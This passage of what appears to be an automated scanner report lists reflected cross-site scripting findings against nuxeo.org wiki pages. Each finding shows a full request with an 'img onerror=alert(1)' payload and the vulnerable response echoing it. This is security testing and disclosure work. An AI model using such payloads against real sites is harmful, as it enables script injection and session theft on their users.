Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:46 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12989
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main69a0c%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec19e02784b/JCRMigration?format=xar&amp;name=Main69a0c"><img src=a onerror=alert(1)>c19e02784b.JCRMigration&amp;pages=Main69a0c">
...[SNIP]...

1.86. http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigration [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/JCRMigration

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dc44"><img%20src%3da%20onerror%3dalert(1)>62e95f58fe5 was submitted in the REST URL parameter 5. This input was echoed as 2dc44"><img src=a onerror=alert(1)>62e95f58fe5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/JCRMigration2dc44"><img%20src%3da%20onerror%3dalert(1)>62e95f58fe5 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:01 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12986
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/JCRMigration2dc44%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E62e95f58fe5?format=xar&amp;name=Main.JCRMigration2dc44"><img src=a onerror=alert(1)>62e95f58fe5&amp;pages=Main.JCRMigration2dc44">
...[SNIP]...

1.87. http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigration [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/JCRMigration

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d9d25<img%20src%3da%20onerror%3dalert(1)>6e390cba6e2 was submitted in the REST URL parameter 5. This input was echoed as d9d25<img src=a onerror=alert(1)>6e390cba6e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/JCRMigrationd9d25<img%20src%3da%20onerror%3dalert(1)>6e390cba6e2 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:45 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12924
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigrationd9d25%3Cimg+src%3Da+onerror%3Dalert%281%29%3E6e390cba6e2'>JCRMigrationd9d25<img src=a onerror=alert(1)>6e390cba6e2</a>
...[SNIP]...

1.88. http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Framework [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Nuxeo+Testing+Framework

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f7d4"><img%20src%3da%20onerror%3dalert(1)>d2d6af453d5 was submitted in the REST URL parameter 4. This input was echoed as 6f7d4"><img src=a onerror=alert(1)>d2d6af453d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main6f7d4"><img%20src%3da%20onerror%3dalert(1)>d2d6af453d5/Nuxeo+Testing+Framework HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:32 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13149
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main6f7d4%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ed2d6af453d5/Nuxeo+Testing+Framework?format=xar&amp;name=Main6f7d4"><img src=a onerror=alert(1)>d2d6af453d5.Nuxeo Testing Framework&amp;pages=Main6f7d4">
...[SNIP]...

1.89. http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Framework [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Nuxeo+Testing+Framework

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1e829<img%20src%3da%20onerror%3dalert(1)>4dac70b73d4 was submitted in the REST URL parameter 4. This input was echoed as 1e829<img src=a onerror=alert(1)>4dac70b73d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main1e829<img%20src%3da%20onerror%3dalert(1)>4dac70b73d4/Nuxeo+Testing+Framework HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:26 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13083
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main1e829%3Cimg+src%3Da+onerror%3Dalert%281%29%3E4dac70b73d4/">Main1e829<img src=a onerror=alert(1)>4dac70b73d4</a>
...[SNIP]...

1.90. http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Framework [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Nuxeo+Testing+Framework

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fd33a<img%20src%3da%20onerror%3dalert(1)>04410ba00e3 was submitted in the REST URL parameter 5. This input was echoed as fd33a<img src=a onerror=alert(1)>04410ba00e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Nuxeo+Testing+Frameworkfd33a<img%20src%3da%20onerror%3dalert(1)>04410ba00e3 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:18 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13071
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Frameworkfd33a%3Cimg+src%3Da+onerror%3Dalert%281%29%3E04410ba00e3'>Nuxeo Testing Frameworkfd33a<img src=a onerror=alert(1)>04410ba00e3</a>
...[SNIP]...

1.91. http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Framework [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Nuxeo+Testing+Framework

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe512"><img%20src%3da%20onerror%3dalert(1)>8ca69496434 was submitted in the REST URL parameter 5. This input was echoed as fe512"><img src=a onerror=alert(1)>8ca69496434 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Nuxeo+Testing+Frameworkfe512"><img%20src%3da%20onerror%3dalert(1)>8ca69496434 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:10 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13133
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/Nuxeo+Testing+Frameworkfe512%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8ca69496434?format=xar&amp;name=Main.Nuxeo Testing Frameworkfe512"><img src=a onerror=alert(1)>8ca69496434&amp;pages=Main.Nuxeo Testing Frameworkfe512">
...[SNIP]...

1.92. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStarted [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/NuxeoDevGettingStarted

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3d601<img%20src%3da%20onerror%3dalert(1)>573ef0b70f0 was submitted in the REST URL parameter 4. This input was echoed as 3d601<img src=a onerror=alert(1)>573ef0b70f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main3d601<img%20src%3da%20onerror%3dalert(1)>573ef0b70f0/NuxeoDevGettingStarted HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:40 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13066
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main3d601%3Cimg+src%3Da+onerror%3Dalert%281%29%3E573ef0b70f0/">Main3d601<img src=a onerror=alert(1)>573ef0b70f0</a>
...[SNIP]...

1.93. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStarted [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/NuxeoDevGettingStarted

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4eff"><img%20src%3da%20onerror%3dalert(1)>f1fa6463d0e was submitted in the REST URL parameter 4. This input was echoed as a4eff"><img src=a onerror=alert(1)>f1fa6463d0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Maina4eff"><img%20src%3da%20onerror%3dalert(1)>f1fa6463d0e/NuxeoDevGettingStarted HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:46 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13132
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Maina4eff%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef1fa6463d0e/NuxeoDevGettingStarted?format=xar&amp;name=Maina4eff"><img src=a onerror=alert(1)>f1fa6463d0e.NuxeoDevGettingStarted&amp;pages=Maina4eff">
...[SNIP]...

1.94. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStarted [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/NuxeoDevGettingStarted

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f7c6d<img%20src%3da%20onerror%3dalert(1)>83bdae15118 was submitted in the REST URL parameter 5. This input was echoed as f7c6d<img src=a onerror=alert(1)>83bdae15118 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/NuxeoDevGettingStartedf7c6d<img%20src%3da%20onerror%3dalert(1)>83bdae15118 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:30 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13054
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStartedf7c6d%3Cimg+src%3Da+onerror%3Dalert%281%29%3E83bdae15118'>NuxeoDevGettingStartedf7c6d<img src=a onerror=alert(1)>83bdae15118</a>
...[SNIP]...

1.95. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStarted [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/NuxeoDevGettingStarted

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b0a6"><img%20src%3da%20onerror%3dalert(1)>2f680be3ffe was submitted in the REST URL parameter 5. This input was echoed as 3b0a6"><img src=a onerror=alert(1)>2f680be3ffe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/NuxeoDevGettingStarted3b0a6"><img%20src%3da%20onerror%3dalert(1)>2f680be3ffe HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:41 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13116
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/NuxeoDevGettingStarted3b0a6%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E2f680be3ffe?format=xar&amp;name=Main.NuxeoDevGettingStarted3b0a6"><img src=a onerror=alert(1)>2f680be3ffe&amp;pages=Main.NuxeoDevGettingStarted3b0a6">
...[SNIP]...

1.96. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/NuxeoProdSetup

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6520f<img%20src%3da%20onerror%3dalert(1)>b3521d0e8d was submitted in the REST URL parameter 4. This input was echoed as 6520f<img src=a onerror=alert(1)>b3521d0e8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main6520f<img%20src%3da%20onerror%3dalert(1)>b3521d0e8d/NuxeoProdSetup HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:12 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12949
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main6520f%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eb3521d0e8d/">Main6520f<img src=a onerror=alert(1)>b3521d0e8d</a>
...[SNIP]...

1.97. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/NuxeoProdSetup

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6ecb"><img%20src%3da%20onerror%3dalert(1)>3570ded39b1 was submitted in the REST URL parameter 4. This input was echoed as b6ecb"><img src=a onerror=alert(1)>3570ded39b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Mainb6ecb"><img%20src%3da%20onerror%3dalert(1)>3570ded39b1/NuxeoProdSetup HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:21 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13028
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
